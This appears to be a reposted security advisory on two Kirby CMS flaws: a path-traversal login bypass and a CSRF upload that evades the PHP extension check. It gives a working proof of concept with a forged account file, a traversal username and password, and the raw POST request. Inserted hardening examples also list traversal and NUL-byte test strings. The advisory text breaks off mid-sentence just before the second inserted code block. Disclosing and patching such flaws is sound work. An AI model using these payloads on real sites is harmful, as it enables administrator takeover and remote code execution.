Kirby CMS multi-vulnerability analysis-vulnerability warning-the black bar safety net
2015-09-10T00:00:00
ID: MYHACK58:62201566783 | Type: myhack58 | Reporter: Anonymous (佚名) | Modified: 2015-09-10T00:00:00
Description
Kirby CMS is an easy-to-use CMS that is simple to install and very flexible to set up. It needs no database: all content is stored on the file system. It supports Markdown syntax, templates and plug-ins.
Vulnerability details
Two vulnerabilities were found in Kirby CMS:
1. Authentication bypass via path traversal
2. CSRF file upload and PHP script execution
Authentication bypass via path traversal
KirbyCMS has a vulnerability that lets an attacker make the CMS read an account file from an arbitrary directory on the hosting environment.
Because KirbyCMS is a file-based content management system, it also stores its authentication data as files in the accounts directory: each user has their own account file, named like kirby/site/accounts/[username].php.
At the login screen, KirbyCMS loads that account file to verify the password hash. While building the file path it does not check that the username supplied in the login form is free of path traversal sequences such as '../'.
This results in a path traversal vulnerability: an attacker with an account on the same multi-user hosting environment can bypass authentication by writing a file into /tmp or another world-writable directory.
The vulnerable code is in the kirby/core/user.php file:
abstract class UserAbstract {

  protected $username = null;
  protected $cache    = array();
  protected $data     = null;

  public function __construct($username) {
    $this->username = str::lower($username);
    // check if the account file exists
    if(!file_exists($this->file())) {
      throw new Exception('The user account could not be found');
    }
    ...
  }

  protected function file() {
    return kirby::instance()->roots()->accounts() . DS . $this->username() . '.php';
  }
In addition, while attempting the authentication bypass we found that KirbyCMS allows authentication over plain HTTP, and that the authenticated session is not terminated.
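As an added example (not Kirby's own code), a hardened version of the account-file lookup above: the username is validated against a strict allowlist before it touches the file system, and the resolved path is then checked to stay inside the accounts directory. The function name safeAccountFile() and the demo directory are assumptions of this example.

```php
<?php
// Added example, not Kirby's code: two independent defences against the
// traversal in file(). 1) an allowlist pattern rejects '/', '..' and NUL
// before any path is built; 2) realpath() confirms the final path is still
// inside the accounts directory (also catches symlinks planted there).
// safeAccountFile() and the temp directory are assumed names for this demo.

function safeAccountFile(string $accountsRoot, string $username): string
{
    // Kirby lowercases the username; the allowlist starts with an alphanumeric
    // so '.', '..' and hidden files never match.
    if (!preg_match('/^[a-z0-9][a-z0-9._-]{0,63}$/', $username)) {
        throw new InvalidArgumentException('Invalid username');
    }
    $root = realpath($accountsRoot);
    if ($root === false) {
        throw new RuntimeException('Accounts directory does not exist');
    }
    $candidate = $root . DIRECTORY_SEPARATOR . $username . '.php';
    // realpath() resolves '..' and symlinks; reject anything outside $root.
    $resolved = realpath($candidate);
    if ($resolved === false || strpos($resolved, $root . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException('The user account could not be found');
    }
    return $resolved;
}

// Constructed demo: a temporary accounts directory with one account file.
$accounts = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'kirby-accounts-demo';
@mkdir($accounts, 0700);
file_put_contents($accounts . '/victim.php', "<?php if(!defined('KIRBY')) exit ?>\nrole: admin\n");

foreach (['victim', '../../../../tmp/bypassauth', "victim\0x", 'nobody'] as $name) {
    try {
        echo json_encode($name) . ' => ' . safeAccountFile($accounts, $name) . "\n";
    } catch (Exception $e) {
        echo json_encode($name) . ' => rejected: ' . $e->getMessage() . "\n";
    }
}
```

Only the first name resolves; the traversal string and the NUL-byte variant fail the allowlist, and the nonexistent account fails the realpath check.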
Proof-of-concept
KirbyCMS saves each account's credentials in a PHP file in the kirby/site/accounts directory, so that the contents cannot be fetched directly over the web.
An account file looks like this:
<?php if(!defined('KIRBY')) exit ?>

username: victim
email: victim@mailserver.com
password: >
  $2a$10$B3DQ5e40XQOSUDSrA4AnxeolXJNDBb5Kbnfkocklajznvdu7iuqpc
language: en
role: admin
To bypass authentication, an attacker who holds an account on the same hosting environment writes an account file with the above content, including a password hash they know, into a world-readable directory, for example /tmp/bypassauth.php.
Because of the path traversal vulnerability, the attacker can then log in with these credentials as administrator at http://victim-server.com/kirby/panel/login:
Username: ../../../../../../../../tmp/bypassauth
Password: trythisout
This produces an HTTP POST request similar to:
POST /kirby/panel/login HTTP/1.1
Host: victim_kirby_site
Cookie: PHPSESSID=mqhncr49bpbgnt9kqrp055v7r6; kirby=58eddb6...
Content-Length: 149

username=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Ftmp%2Fbypassauth&password=trythisout&_csfr=erQ1UvOm2L1...
This causes KirbyCMS to load the credentials from the path /sites/victim/kirby/site/accounts/../../../../../../../../tmp/bypassauth.php.
The attacker finally receives a response containing:
  class="hgroup hgroup-single-line cf">
    class="hgroup-title">
      href="#/users/edit/../../../../../../../../tmp/bypassauth">Your account
    class="hgroup-options shiv shiv-dark shiv-left">
The attacker has obtained administrator permissions in the KirbyCMS management panel.
CSRF upload and PHP script execution
KirbyCMS has a vulnerability that allows uploading PHP script files, which are normally not allowed. This flaw can only be used by an authenticated user, but administrator privileges are not required.
In addition, KirbyCMS has a second vulnerability, cross-site request forgery (CSRF): if an attacker convinces a user to visit a phishing site, the attacker can make the already authenticated user perform a file upload. This lets an unauthenticated attacker modify or upload content.
Combining these two vulnerabilities, we can execute arbitrary PHP code.
PHP script execution
KirbyCMS allows not only administrators but also low-privilege users with access to the admin backend to upload content. The upload function accepts images and other media files.
Before saving an uploaded file, KirbyCMS performs the following filtering:
protected function checkUpload($file, $blueprint) {
  if(strtolower($file->extension()) == kirby()->option('content.file.extension', 'txt')) {
    throw new Exception('Content files cannot be uploaded');
  } else if(strtolower($file->extension()) == 'php' or
            in_array($file->mime(), f::$mimes['php'])) {
    throw new Exception('PHP files cannot be uploaded');
  } else if(strtolower($file->extension()) == 'html' or
            $file->mime() == 'text/html') {
    throw new Exception('HTML files cannot be uploaded');
  }
  ...
}
We can see that the PHP check only looks at whether the file's extension is ".php" or whether the file's MIME type is one defined for PHP. If either condition is met, KirbyCMS aborts the upload.
Unfortunately, both checks are very easy to bypass.
In many server configurations, for example Ubuntu or Debian, the extensions handled as PHP scripts are .php, .php4 and .php5. Simply renaming a malicious PHP script to .php4 or .php5 bypasses the extension check. MIME-type detection only in the
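As an added example (not Kirby's own code), an allowlist-based replacement for the extension test in checkUpload() that also inspects every dot-separated segment of the name, since Apache's mod_mime treats each segment as an extension. The function name isAllowedUploadName() and the sample file names are assumptions of this example.

```php
<?php
// Added example, not Kirby's code: replace the single-extension denylist
// ('php') with an allowlist of media extensions, and refuse any name that
// carries a script-handler extension in ANY segment (shell.php5,
// shell.phtml, shell.php.jpg), which AddHandler/AddType rules match on.
// isAllowedUploadName() is an assumed name for this example.

function isAllowedUploadName(
    string $filename,
    array $allowed = ['jpg', 'jpeg', 'png', 'gif', 'pdf']
): bool {
    $name = basename($filename);
    if ($name === '' || strpos($name, "\0") !== false) {
        return false;                        // empty or NUL-byte name
    }
    $parts = explode('.', strtolower($name));
    if (count($parts) < 2) {
        return false;                        // no extension at all
    }
    // Extensions commonly mapped to script handlers on Debian/Ubuntu Apache.
    $executable = ['php', 'php3', 'php4', 'php5', 'php7', 'phtml', 'phps', 'phar', 'cgi', 'pl', 'sh'];
    foreach (array_slice($parts, 1) as $segment) {
        if (in_array($segment, $executable, true)) {
            return false;                    // script extension in any segment
        }
    }
    // The final extension must be on the allowlist.
    return in_array(end($parts), $allowed, true);
}

// Constructed samples covering the bypasses described in the article.
$samples = ['photo.jpg', 'shell.php', 'shell.php5', 'shell.phtml',
            'shell.php.jpg', 'shell.jpg.php4', 'README'];
foreach ($samples as $f) {
    printf("%-16s %s\n", $f, isAllowedUploadName($f) ? 'allowed' : 'rejected');
}
```

Only photo.jpg is accepted; every variant with a script extension in any segment is rejected regardless of what the MIME check reports.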